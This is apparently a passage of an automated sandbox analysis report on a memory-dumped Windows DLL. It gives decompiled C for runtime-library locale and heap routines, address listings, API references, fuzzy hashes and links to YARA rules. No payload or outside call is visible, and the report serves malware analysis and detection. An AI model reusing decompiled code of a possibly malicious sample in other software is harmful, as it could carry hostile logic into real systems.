																__eflags = _t282;
																if(_t282 != 0) {
																	_t101 = _t367 + 2; // 0x6
																	_t453 = _t101 << 4;
																	__eflags = _t453;
																	_t283 =  &_v280;
																	_v724 = _t453;
																	_t428 =  *(_t453 + _t435);
																	_t384 =  *(_t453 + _t435);
																	while(1) {
																		_v712 = _v712 & 0x00000000;
																		__eflags =  *_t283 -  *_t384;
																		_t455 = _v724;
																		if( *_t283 !=  *_t384) {
																			break;
																		}
																		__eflags =  *_t283;
																		if( *_t283 == 0) {
																			L93:
																			_t284 = _v712;
																		} else {
																			_t462 =  *((intOrPtr*)(_t283 + 2));
																			__eflags = _t462 -  *((intOrPtr*)(_t384 + 2));
																			_v718 = _t462;
																			_t455 = _v724;
																			if(_t462 !=  *((intOrPtr*)(_t384 + 2))) {
																				break;
																			} else {
																				_t283 = _t283 + 4;
																				_t384 = _t384 + 4;
																				__eflags = _v718;
																				if(_v718 != 0) {
																					continue;
																				} else {
																					goto L93;
																				}
																			}
																		}
																		L95:
																		__eflags = _t284;
																		if(_t284 != 0) {
																			_t385 =  &_v280;
																			_t428 = _t385 + 2;
																			do {
																				_t285 =  *_t385;
																				_t385 = _t385 + 2;
																				__eflags = _t285 - _v712;
																			} while (_t285 != _v712);
																			_v728 = (_t385 - _t428 >> 1) + 1;
																			_t288 = E6DE1F26D(_t385 - _t428 >> 1, 4 + ((_t385 - _t428 >> 1) + 1) * 2);
																			_v740 = _t288;
																			__eflags = _t288;
																			if(_t288 == 0) {
																				goto L86;
																			} else {
																				_v732 =  *((intOrPtr*)(_t455 + _t435));
																				_t125 = _t367 * 4; // 0xe764e850
																				_v744 =  *((intOrPtr*)(_t435 + _t125 + 0xa0));
																				_t128 = _t435 + 8; // 0x8b018b
																				_v748 =  *_t128;
																				_t394 =  &_v280;
																				_v720 = _t288 + 4;
																				_t292 = E6DE191A7(_t288 + 4, _v728,  &_v280);
																				_t482 = _t480 + 0xc;
																				__eflags = _t292;
																				if(_t292 != 0) {
																					_t293 = _v712;
																					_push(_t293);
																					_push(_t293);
																					_push(_t293);
																					_push(_t293);
																					_push(_t293);
																					E6DE12188();
																					asm("int3");
																					_t295 =  *0x6de976f0; // 0x1536540
																					 *0x6de95108 =  *((intOrPtr*)(_t295 + 0x88));
																					 *0x6de951c0 =  *_t295;
																					_t296 =  *((intOrPtr*)(_t295 + 4));
																					 *0x6de951ec = _t296;
																					return _t296;
																				} else {
																					__eflags = _v280 - 0x43;
																					 *((intOrPtr*)(_t455 + _t435)) = _v720;
																					if(_v280 != 0x43) {
																						L104:
																						_t299 = E6DE1DB3B(_t367, _t394, _t435,  &_v708);
																						_t398 = _v712;
																						 *(_t435 + 0xa0 + _t367 * 4) = _t299;
																					} else {
																						__eflags = _v278;
																						if(_v278 != 0) {
																							goto L104;
																						} else {
																							_t398 = _v712;
																							 *(_t435 + 0xa0 + _t367 * 4) = _t398;
																						}
																					}
																					__eflags = _t367 - 2;
																					if(_t367 != 2) {
																						__eflags = _t367 - 1;
																						if(_t367 != 1) {
																							__eflags = _t367 - 5;
																							if(_t367 == 5) {
																								 *((intOrPtr*)(_t435 + 0x14)) = _v716;
																							}
																						} else {
																							 *((intOrPtr*)(_t435 + 0x10)) = _v716;
																						}
																					} else {
																						_t460 = _v736;
																						_t428 = _t398;
																						_t408 = _t460;
																						 *(_t435 + 8) = _v716;
																						_v720 = _t460;
																						_v728 = _t460[8];
																						_v716 = _t460[9];
																						while(1) {
																							_t154 = _t435 + 8; // 0x8b018b
																							__eflags =  *_t154 -  *_t408;
																							if( *_t154 ==  *_t408) {
																								break;
																							}
																							_t461 = _v720;
																							_t428 = _t428 + 1;
																							_t331 =  *_t408;
																							 *_t461 = _v728;
																							_v716 = _t408[1];
																							_t408 = _t461 + 8;
																							 *((intOrPtr*)(_t461 + 4)) = _v716;
																							_t367 = _v752;
																							_t460 = _v736;
																							_v728 = _t331;
																							_v720 = _t408;
																							__eflags = _t428 - 5;
																							if(_t428 < 5) {
																								continue;
																							} else {
																							}
																							L112:
																							__eflags = _t428 - 5;
																							if(__eflags == 0) {
																								_t178 = _t435 + 8; // 0x8b018b
																								_t322 = E6DE26102(_t367, _t428, _t435, __eflags, _v712, 1, 0x6de40ea8, 0x7f,  &_v536,  *_t178, 1);
																								_t482 = _t482 + 0x1c;
																								__eflags = _t322;
																								_t323 = _v712;
																								if(_t322 == 0) {
																									_t460[1] = _t323;
																								} else {
																									do {
																										 *(_t468 + _t323 * 2 - 0x20c) =  *(_t468 + _t323 * 2 - 0x20c) & 0x000001ff;
																										_t323 = _t323 + 1;
																										__eflags = _t323 - 0x7f;
																									} while (_t323 < 0x7f);
																									_t326 = E6DDF1C3C( &_v536,  *0x6de951e8, 0xfe);
																									_t482 = _t482 + 0xc;
																									__eflags = _t326;
																									_t460[1] = 0 | _t326 == 0x00000000;
																								}
																								_t193 = _t435 + 8; // 0x8b018b
																								 *_t460 =  *_t193;
																							}
																							 *(_t435 + 0x18) = _t460[1];
																							goto L123;
																						}
																						__eflags = _t428;
																						if(_t428 != 0) {
																							 *_t460 =  *(_t460 + _t428 * 8);
																							_t460[1] =  *(_t460 + 4 + _t428 * 8);
																							 *(_t460 + _t428 * 8) = _v728;
																							 *(_t460 + 4 + _t428 * 8) = _v716;
																						}
																						goto L112;
																					}
																					L123:
																					_t300 = _t367 * 0xc;
																					_t200 = _t300 + 0x6de40de8; // 0x6ddd815c
																					 *0x6de3a26c(_t435);
																					_t302 =  *((intOrPtr*)( *_t200))();
																					_t401 = _v732;
																					__eflags = _t302;
																					if(_t302 == 0) {
																						__eflags = _t401 - 0x6de952b0;
																						if(_t401 != 0x6de952b0) {
																							_t459 = _t367 + _t367;
																							__eflags = _t459;
																							asm("lock xadd [eax], ecx");
																							if(_t459 != 0) {
																								goto L128;
																							} else {
																								_t218 = _t459 * 8; // 0x10468b00
																								E6DE1CBD3( *((intOrPtr*)(_t435 + _t218 + 0x28)));
																								_t221 = _t459 * 8; // 0x3b8e8
																								E6DE1CBD3( *((intOrPtr*)(_t435 + _t221 + 0x24)));
																								_t224 = _t367 * 4; // 0xe764e850
																								E6DE1CBD3( *((intOrPtr*)(_t435 + _t224 + 0xa0)));
																								_t404 = _v712;
																								 *((intOrPtr*)(_v724 + _t435)) = _t404;
																								 *(_t435 + 0xa0 + _t367 * 4) = _t404;
																							}
																						}
																						_t402 = _v740;
																						 *_t402 = 1;
																						 *((intOrPtr*)(_t435 + 0x28 + (_t367 + _t367) * 8)) = _t402;
																					} else {
																						 *(_v724 + _t435) = _t401;
																						_t205 = _t367 * 4; // 0xe764e850
																						E6DE1CBD3( *((intOrPtr*)(_t435 + _t205 + 0xa0)));
																						 *(_t435 + 0xa0 + _t367 * 4) = _v744;
																						E6DE1CBD3(_v740);
																						 *(_t435 + 8) = _v748;
																						goto L86;
																					}
																					goto L87;
																				}
																			}
																		} else {
																			goto L87;
																		}
																		goto L131;
																	}
																	asm("sbb eax, eax");
																	_t284 = _t283 | 0x00000001;
																	__eflags = _t284;
																	goto L95;
																} else {
																	L86:
																	__eflags = 0;
																	L87:
																	_pop(_t456);
																	__eflags = _v16 ^ _t468;
																	return E6DDEF8A5(_v16 ^ _t468, _t428, _t456);
																}
															} else {
																_t333 = _t450 + _t450;
																__eflags = _t333 - 0x106;
																if(_t333 >= 0x106) {
																	E6DDF03A9();
																	goto L83;
																} else {
																	 *((short*)(_t466 + _t333 - 0x10c)) = 0;
																	_t335 =  &_v276;
																	_push(_t335);
																	_push(_v460);
																	_push(_t431);
																	L84();
																	_t475 = _t478 + 0xc;
																	__eflags = _t335;
																	_t270 = _v452;
																	if(_t335 != 0) {
																		_t270 = _t270 + 1;
																		_v452 = _t270;
																	}
																	L55:
																	_t447 = _t362 + _t450 * 2;
																	_t373 = 0;
																	__eflags =  *_t447;
																	if( *_t447 == 0) {
																		L57:
																		__eflags = _t270;
																		L78:
																		if(__eflags != 0) {
																			goto L80;
																		} else {
																		}
																		goto L81;
																	} else {
																		_t447 = _t447 + 2;
																		__eflags =  *_t447;
																		if( *_t447 != 0) {
																			continue;
																		} else {
																			goto L57;
																		}
																	}
																}
															}
														}
													} else {
														_t336 = 0x3b;
														__eflags =  *_t362 - _t336;
														if( *_t362 != _t336) {
															break;
														} else {
															goto L49;
														}
													}
												}
											}
											goto L131;
										}
										goto L81;
									}
								}
							}
						}
					} else {
						__eflags = _t447;
						if(_t447 != 0) {
							_push(_t447);
							_push(_t251);
							_push(_t431);
							L84();
						}
						L81:
						_pop(_t448);
						__eflags = _v12 ^ _t466;
						return E6DDEF8A5(_v12 ^ _t466, _t425, _t448);
					}
				}
				L131:
			}

0x6de1e506
0x6de1e509
0x6de1e50b
0x6de1e50e
0x6de1e50f
0x6de1e518
0x6de1e51b
0x6de1e520
0x6de1e522
0x6de1e524
0x6de1e527
0x6de1e640
0x6de1e645
0x6de1e52d
0x6de1e52d
0x6de1e52e
0x6de1e52e
0x6de1e531
0x6de1e534
0x6de1e536
0x6de1e539
0x6de1e539
0x6de1e53c
0x6de1e53e
0x6de1e541
0x6de1e546
0x6de1e554
0x6de1e55e
0x6de1e561
0x6de1e564
0x6de1e564
0x6de1e56f
0x6de1e574
0x6de1e579
0x00000000
0x6de1e57f
0x6de1e582
0x6de1e582
0x6de1e585
0x6de1e587
0x6de1e58a
0x6de1e58a
0x6de1e58a
0x6de1e58c
0x6de1e58c
0x6de1e58c
0x6de1e592
0x00000000
0x00000000
0x6de1e597
0x6de1e5ae
0x6de1e5ae
0x6de1e599
0x6de1e599
0x6de1e5a1
0x00000000
0x6de1e5a3
0x6de1e5a3
0x6de1e5a6
0x6de1e5ac
0x00000000
0x00000000
0x00000000
0x00000000
0x6de1e5ac
0x6de1e5a1
0x6de1e5b7
0x6de1e5bc
0x6de1e5be
0x6de1e5c3
0x6de1e5c6
0x6de1e5c9
0x6de1e5cc
0x6de1e5cf
0x6de1e5d1
0x6de1e5d6
0x6de1e5e0
0x6de1e5e8
0x6de1e5f0
0x00000000
0x6de1e5f6
0x6de1e5fa
0x6de1e647
0x6de1e64d
0x6de1e650
0x6de1e653
0x6de1e655
0x6de1e659
0x6de1e65d
0x6de1e65f
0x6de1e662
0x6de1e667
0x6de1e65d
0x6de1e668
0x6de1e66b
0x6de1e66d
0x6de1e66f
0x6de1e673
0x6de1e674
0x6de1e676
0x6de1e679
0x6de1e67e
0x6de1e674
0x6de1e681
0x6de1e684
0x6de1e687
0x6de1e68a
0x6de1e68d
0x6de1e68d
0x6de1e5fc
0x6de1e5fc
0x6de1e5ff
0x6de1e602
0x6de1e604
0x6de1e608
0x6de1e60c
0x6de1e60e
0x6de1e611
0x6de1e616
0x6de1e60c
0x6de1e617
0x6de1e61c
0x6de1e61e
0x6de1e623
0x6de1e625
0x6de1e628
0x6de1e62d
0x6de1e623
0x6de1e62e
0x6de1e632
0x6de1e632
0x6de1e635
0x6de1e639
0x6de1e63c
0x6de1e63c
0x00000000
0x6de1e63f
0x00000000
0x6de1e5f0
0x6de1e5b2
0x6de1e5b4
0x6de1e5b4
0x00000000
0x6de1e5b4
0x6de1e694
0x6de1e695
0x6de1e696
0x6de1e697
0x6de1e698
0x6de1e699
0x6de1e69e
0x6de1e6a1
0x6de1e6a2
0x6de1e6a4
0x6de1e6aa
0x6de1e6b1
0x6de1e6b4
0x6de1e6b7
0x6de1e6b8
0x6de1e6b9
0x6de1e6bc
0x6de1e6bd
0x6de1e6c0
0x6de1e6c6
0x6de1e6c8
0x6de1e6ed
0x6de1e6f7
0x6de1e6fd
0x6de1e6ff
0x6de1e705
0x6de1e707
0x6de1e95a
0x6de1e95b
0x00000000
0x6de1e70d
0x6de1e70d
0x6de1e711
0x6de1e878
0x6de1e88f
0x6de1e894
0x6de1e897
0x6de1e899
0x6de1e89f
0x6de1e89f
0x6de1e8a1
0x6de1e8a1
0x6de1e8a4
0x6de1e8a6
0x6de1e8ac
0x6de1e8ac
0x6de1e8ae
0x6de1e935
0x6de1e935
0x6de1e8b4
0x6de1e8b4
0x6de1e8b6
0x6de1e8bc
0x6de1e8bf
0x6de1e8c2
0x6de1e8c8
0x00000000
0x00000000
0x6de1e8ca
0x6de1e8ce
0x6de1e8f7
0x6de1e8f7
0x6de1e8f9
0x6de1e8d0
0x6de1e8d0
0x6de1e8d4
0x6de1e8d8
0x6de1e8df
0x6de1e8e5
0x00000000
0x6de1e8e7
0x6de1e8e7
0x6de1e8ea
0x6de1e8ed
0x6de1e8f5
0x00000000
0x00000000
0x00000000
0x00000000
0x6de1e8f5
0x6de1e8e5
0x6de1e904
0x6de1e904
0x6de1e906
0x6de1e934
0x6de1e934
0x00000000
0x6de1e908
0x6de1e908
0x6de1e90e
0x6de1e90f
0x6de1e910
0x6de1e911
0x6de1e916
0x6de1e91c
0x6de1e91f
0x6de1e921
0x6de1e928
0x6de1e92a
0x6de1e92c
0x6de1e923
0x6de1e923
0x6de1e924
0x00000000
0x6de1e924
0x6de1e921
0x00000000
0x6de1e906
0x6de1e8fd
0x6de1e8ff
0x6de1e902
0x6de1e902
0x00000000
0x6de1e902
0x6de1e93b
0x6de1e93b
0x6de1e93c
0x6de1e93f
0x6de1e945
0x6de1e945
0x6de1e94e
0x6de1e950
0x00000000
0x6de1e952
0x6de1e952
0x00000000
0x6de1e952
0x6de1e950
0x00000000
0x6de1e717
0x6de1e717
0x6de1e71c
0x00000000
0x6de1e722
0x6de1e722
0x6de1e727
0x00000000
0x6de1e72d
0x6de1e72d
0x6de1e733
0x6de1e738
0x6de1e73a
0x6de1e741
0x6de1e742
0x6de1e744
0x00000000
0x00000000
0x6de1e74a
0x6de1e74a
0x6de1e74e
0x6de1e754
0x00000000
0x6de1e75a
0x6de1e75c
0x6de1e75d
0x6de1e760
0x00000000
0x6de1e766
0x6de1e766
0x6de1e76c
0x6de1e771
0x6de1e77b
0x6de1e77f
0x6de1e784
0x6de1e787
0x6de1e789
0x00000000
0x6de1e78b
0x6de1e78b
0x6de1e78d
0x6de1e790
0x6de1e790
0x6de1e793
0x6de1e796
0x6de1e796
0x6de1e7a1
0x6de1e7a3
0x6de1e7a5
0x00000000
0x00000000
0x6de1e7a5
0x00000000
0x6de1e7a7
0x6de1e7a7
0x6de1e7ad
0x6de1e7b0
0x6de1e7b0
0x6de1e7be
0x6de1e7c7
0x6de1e7cc
0x6de1e7d2
0x6de1e7d5
0x6de1e7d6
0x6de1e7d8
0x6de1e7e6
0x6de1e7e6
0x6de1e7ed
0x6de1e84e
0x00000000
0x6de1e7ef
0x6de1e7ef
0x6de1e7fd
0x6de1e802
0x6de1e805
0x6de1e807
0x6de1e977
0x6de1e979
0x6de1e97a
0x6de1e97b
0x6de1e97c
0x6de1e97d
0x6de1e97e
0x6de1e983
0x6de1e986
0x6de1e987
0x6de1e98f
0x6de1e996
0x6de1e999
0x6de1e99a
0x6de1e99d
0x6de1e9a1
0x6de1e9a2
0x6de1e9a5
0x6de1e9b5
0x6de1e9d8
0x6de1e9dd
0x6de1e9e0
0x6de1e9e2
0x6de1e9f7
0x6de1e9fa
0x6de1e9fa
0x6de1e9fd
0x6de1ea03
0x6de1ea09
0x6de1ea0c
0x6de1ea0e
0x6de1ea11
0x6de1ea18
0x6de1ea1b
0x6de1ea21
0x00000000
0x00000000
0x6de1ea23
0x6de1ea27
0x6de1ea50
0x6de1ea50
0x6de1ea29
0x6de1ea29
0x6de1ea2d
0x6de1ea31
0x6de1ea38
0x6de1ea3e
0x00000000
0x6de1ea40
0x6de1ea40
0x6de1ea43
0x6de1ea46
0x6de1ea4e
0x00000000
0x00000000
0x00000000
0x00000000
0x6de1ea4e
0x6de1ea3e
0x6de1ea5d
0x6de1ea5d
0x6de1ea5f
0x6de1ea65
0x6de1ea6b
0x6de1ea6e
0x6de1ea6e
0x6de1ea71
0x6de1ea74
0x6de1ea74
0x6de1ea84
0x6de1ea92
0x6de1ea97
0x6de1ea9e
0x6de1eaa0
0x00000000
0x6de1eaa6
0x6de1eaac
0x6de1eab2
0x6de1eab9
0x6de1eabf
0x6de1eac2
0x6de1eac8
0x6de1ead5
0x6de1eadc
0x6de1eae1
0x6de1eae4
0x6de1eae6
0x6de1ed3f
0x6de1ed45
0x6de1ed46
0x6de1ed47
0x6de1ed48
0x6de1ed49
0x6de1ed4a
0x6de1ed4f
0x6de1ed50
0x6de1ed5b
0x6de1ed63
0x6de1ed69
0x6de1ed6c
0x6de1ed71
0x6de1eaec
0x6de1eaec
0x6de1eafa
0x6de1eafd
0x6de1eb18
0x6de1eb1f
0x6de1eb25
0x6de1eb2b
0x6de1eaff
0x6de1eaff
0x6de1eb07
0x00000000
0x6de1eb09
0x6de1eb09
0x6de1eb0f
0x6de1eb0f
0x6de1eb07
0x6de1eb32
0x6de1eb35
0x6de1ec52
0x6de1ec55
0x6de1ec62
0x6de1ec65
0x6de1ec6d
0x6de1ec6d
0x6de1ec57
0x6de1ec5d
0x6de1ec5d
0x6de1eb3b
0x6de1eb3b
0x6de1eb41
0x6de1eb49
0x6de1eb4b
0x6de1eb4e
0x6de1eb57
0x6de1eb60
0x6de1eb66
0x6de1eb66
0x6de1eb69
0x6de1eb6b
0x00000000
0x00000000
0x6de1eb6d
0x6de1eb73
0x6de1eb74
0x6de1eb7f
0x6de1eb87
0x6de1eb8f
0x6de1eb92
0x6de1eb95
0x6de1eb9b
0x6de1eba1
0x6de1eba7
0x6de1ebad
0x6de1ebb0
0x00000000
0x00000000
0x6de1ebb2
0x6de1ebd7
0x6de1ebd7
0x6de1ebda
0x6de1ebde
0x6de1ebf7
0x6de1ebfc
0x6de1ebff
0x6de1ec01
0x6de1ec07
0x6de1ec42
0x6de1ec09
0x6de1ec09
0x6de1ec0e
0x6de1ec16
0x6de1ec17
0x6de1ec17
0x6de1ec2e
0x6de1ec35
0x6de1ec38
0x6de1ec3d
0x6de1ec3d
0x6de1ec45
0x6de1ec48
0x6de1ec48
0x6de1ec4d
0x00000000
0x6de1ec4d
0x6de1ebb4
0x6de1ebb6
0x6de1ebbb
0x6de1ebc1
0x6de1ebca
0x6de1ebd3
0x6de1ebd3
0x00000000
0x6de1ebb6
0x6de1ec70
0x6de1ec70
0x6de1ec74
0x6de1ec7c
0x6de1ec82
0x6de1ec85
0x6de1ec8b
0x6de1ec8d
0x6de1eccd
0x6de1ecd3
0x6de1ecda
0x6de1ecda
0x6de1ece0
0x6de1ece4
0x00000000
0x6de1ece6
0x6de1ece6
0x6de1ecea
0x6de1ecef
0x6de1ecf3
0x6de1ecf8
0x6de1ecff
0x6de1ed0d
0x6de1ed13
0x6de1ed16
0x6de1ed16
0x6de1ece4
0x6de1ed25
0x6de1ed2d
0x6de1ed36
0x6de1ec8f
0x6de1ec95
0x6de1ec98
0x6de1ec9f
0x6de1ecb1
0x6de1ecb8
0x6de1ecc5
0x00000000
0x6de1ecc5
0x00000000
0x6de1ec8d
0x6de1eae6
0x6de1ea61
0x00000000
0x6de1ea61
0x00000000
0x6de1ea5f
0x6de1ea58
0x6de1ea5a
0x6de1ea5a
0x00000000
0x6de1e9e4
0x6de1e9e4
0x6de1e9e4
0x6de1e9e6
0x6de1e9ea
0x6de1e9eb
0x6de1e9f6
0x6de1e9f6
0x6de1e80d
0x6de1e80d
0x6de1e810
0x6de1e815
0x6de1e972
0x00000000
0x6de1e81b
0x6de1e81d
0x6de1e825
0x6de1e82b
0x6de1e82c
0x6de1e832
0x6de1e833
0x6de1e838
0x6de1e83b
0x6de1e83d
0x6de1e843
0x6de1e845
0x6de1e846
0x6de1e846
0x6de1e854
0x6de1e854
0x6de1e857
0x6de1e859
0x6de1e85c
0x6de1e86a
0x6de1e86a
0x6de1e954
0x6de1e954
0x00000000
0x6de1e956
0x6de1e956
0x00000000
0x6de1e85e
0x6de1e85e
0x6de1e861
0x6de1e864
0x00000000
0x00000000
0x00000000
0x00000000
0x6de1e864
0x6de1e85c
0x6de1e815
0x6de1e807
0x6de1e7da
0x6de1e7dc
0x6de1e7dd
0x6de1e7e0
0x00000000
0x00000000
0x00000000
0x00000000
0x6de1e7e0
0x6de1e7d8
0x6de1e760
0x00000000
0x6de1e754
0x00000000
0x6de1e871
0x6de1e727
0x6de1e71c
0x6de1e711
0x6de1e6ca
0x6de1e6ca
0x6de1e6cc
0x6de1e6ce
0x6de1e6cf
0x6de1e6d0
0x6de1e6d1
0x6de1e6d6
0x6de1e961
0x6de1e965
0x6de1e966
0x6de1e971
0x6de1e971
0x6de1e6c8
0x00000000

APIs

Part of subcall function 6DE1F26D: RtlAllocateHeap.NTDLL(00000000,6DDD75D9,00000000,?,6DDF0F8B,00000002,00000000,?,?,?,6DDB1298,6DDD75D9,00000004,00000000,00000000,00000000), ref: 6DE1F29F

_free.LIBCMT ref: 6DE1E611
_free.LIBCMT ref: 6DE1E628
_free.LIBCMT ref: 6DE1E647
_free.LIBCMT ref: 6DE1E662
_free.LIBCMT ref: 6DE1E679

Strings

m, xrefs: 6DE1E559

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$AllocateHeap
String ID: m
API String ID: 3033488037-2505914020
Opcode ID: a0cd43ee899664255a2c214d08a41e3a41aef6e841e1344081929ebeb66eff05
Instruction ID: b79cdef547269ac832e5e24574395db7bc3b2c6bf7697f4f3941a7376206d0fc
Opcode Fuzzy Hash: a0cd43ee899664255a2c214d08a41e3a41aef6e841e1344081929ebeb66eff05
Instruction Fuzzy Hash: 8D51C171B08A05AFD711CF29CC40A6AB3F5EF49B28F60456DF909E7650EB31E9418B80

Uniqueness

Uniqueness Score: -1.00%

Function 6DE123DD, Relevance: 9.2, APIs: 6, Instructions: 200COMMON

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 6DE12409
__cftoe.LIBCMT ref: 6DE1243B

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: 9be2f7d1e809aec8c7f31069168fb27f52344ab5cad858a301b875255eb84fb0
Instruction ID: 8fc80163693dfb611218e986595563544f780d20dd0390df58bce2ae88121cbc
Opcode Fuzzy Hash: 9be2f7d1e809aec8c7f31069168fb27f52344ab5cad858a301b875255eb84fb0
Instruction Fuzzy Hash: 5651EA32B0C216ABDB258B688C42EBE77B9AF5B32CF71411DE925F6281DF30D5008664

Uniqueness

Uniqueness Score: -1.00%

Function 6DDB18A0, Relevance: 6.0, APIs: 4, Instructions: 31COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6DDB18A7
std::_Locinfo::_Locinfo.LIBCPMT ref: 6DDB18D5

Part of subcall function 6DDB1450: __EH_prolog3.LIBCMT ref: 6DDB1457
Part of subcall function 6DDB1450: std::_Lockit::_Lockit.LIBCPMT ref: 6DDB1464
Part of subcall function 6DDB1450: std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 6DDB14A1

ctype.LIBCPMT ref: 6DDB18E7

Part of subcall function 6DDB1928: __Getctype.LIBCPMT ref: 6DDB1937
Part of subcall function 6DDB1928: __Getcvt.LIBCPMT ref: 6DDB1949

std::_Locinfo::~_Locinfo.LIBCPMT ref: 6DDB18F1

Part of subcall function 6DDB14CE: std::_Locinfo::_Locinfo_dtor.LIBCPMT ref: 6DDB14F5
Part of subcall function 6DDB14CE: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDB1566

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Locinfo::_$H_prolog3LocinfoLockit$GetctypeGetcvtLocinfo::~_Locinfo_ctorLocinfo_dtorLockit::_Lockit::~_ctype
String ID:
API String ID: 1262428101-0
Opcode ID: 6edcb85d720b8ca55236f53c255e5ac1b25e72722591a6ac59875272b576a8b1
Instruction ID: f294c94dd56177066b8b1397d79839e155ea365726ed5745c64324f7d5e66b21
Opcode Fuzzy Hash: 6edcb85d720b8ca55236f53c255e5ac1b25e72722591a6ac59875272b576a8b1
Instruction Fuzzy Hash: EEF05EB5948715EBDB10BF60D445BAD77A4AF4075DF634409F30A5B280CF749A41CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6DDD8499, Relevance: 3.0, APIs: 2, Instructions: 28COMMON

Download Yara Rule

APIs

std::ios_base::_Init.LIBCPMT ref: 6DDD849F

Part of subcall function 6DDD7FAF: __EH_prolog3.LIBCMT ref: 6DDD7FB6
Part of subcall function 6DDD7FAF: std::locale::_Init.LIBCPMT ref: 6DDD7FFF

Part of subcall function 6DDD8BFE: __EH_prolog3.LIBCMT ref: 6DDD8C05

std::ios_base::_Addstd.LIBCPMT ref: 6DDD84D8

Part of subcall function 6DDB1EEA: __CxxThrowException@8.LIBVCRUNTIME ref: 6DDB1F4E

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3Initstd::ios_base::_$AddstdException@8Throwstd::locale::_
String ID:
API String ID: 3866902965-0
Opcode ID: f5465332d492a3dfb33428f77e15b9de503ee84fdd0bcdb1cdbea56ceb3e7f99
Instruction ID: c76899a497e590764c8ae210e6fae644d30716921594a4fc4c122039f0edfba5
Opcode Fuzzy Hash: f5465332d492a3dfb33428f77e15b9de503ee84fdd0bcdb1cdbea56ceb3e7f99
Instruction Fuzzy Hash: A9F0A031504714A7DBA0A7618444B5BB7E8AF44338F01540EFA824BA80C7B5F440CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6DDD78D3, Relevance: 3.0, APIs: 2, Instructions: 24COMMON

Download Yara Rule

APIs

__EH_prolog3.LIBCMT ref: 6DDD78DA
std::locale::_Init.LIBCPMT ref: 6DDD78FB

Part of subcall function 6DDD7005: __EH_prolog3.LIBCMT ref: 6DDD700C
Part of subcall function 6DDD7005: std::_Lockit::_Lockit.LIBCPMT ref: 6DDD7017
Part of subcall function 6DDD7005: std::locale::_Setgloballocale.LIBCPMT ref: 6DDD7032
Part of subcall function 6DDD7005: _Yarn.LIBCPMT ref: 6DDD7048
Part of subcall function 6DDD7005: std::_Lockit::~_Lockit.LIBCPMT ref: 6DDD7088

Memory Dump Source

Source File: 00000000.00000002.568139486.000000006DDB1000.00000020.00020000.sdmp, Offset: 6DDB0000, based on PE: true

Associated: 00000000.00000002.567135782.000000006DDB0000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.596199111.000000006DE3A000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.608518190.000000006DE95000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.609706769.000000006DEAC000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.610220654.000000006DEAD000.00000002.00020000.sdmp Download File

Similarity

API ID: H_prolog3Lockitstd::_std::locale::_$InitLockit::_Lockit::~_SetgloballocaleYarn
String ID:
API String ID: 3152668004-0
Opcode ID: eadb42586a7c5940677c49ba3061e29f1b919af7b25f083e2cde2cc5759823a8
Instruction ID: 36f47d71b82abcd8cfb59cdb94b454e6dda5e54998b2f08da7bc3d820523ffb6
Opcode Fuzzy Hash: eadb42586a7c5940677c49ba3061e29f1b919af7b25f083e2cde2cc5759823a8
Instruction Fuzzy Hash: 54E0D837EE962177DB517B644502B3CA2506B40718F630089F2419F6C0CFB0880143E1

Uniqueness

Uniqueness Score: -1.00%

Function 6DE1D9CA, Relevance: 1.5, APIs: 1, Instructions: 39COMMON

Download Yara Rule

APIs

Part of subcall function 6DE1C7EF: HeapAlloc.KERNEL32(00000008,?,00000000,?,6DE1D6B4,00000001,00000364,?,6DDF0F8B,00000002,00000000,?,?,?,6DDB1298,6DDD75D9), ref: 6DE1C830

_free.LIBCMT ref: 6DE1D9EA

Part of subcall function 6DE1CBD3: HeapFree.KERNEL32(00000000,00000000,?,6DE2CFAF,00000000,00000000,00000000,00000000,?,6DE2D2B4,00000000,00000007,00000000,?,6DE2C0FC,00000000), ref: 6DE1CBE9
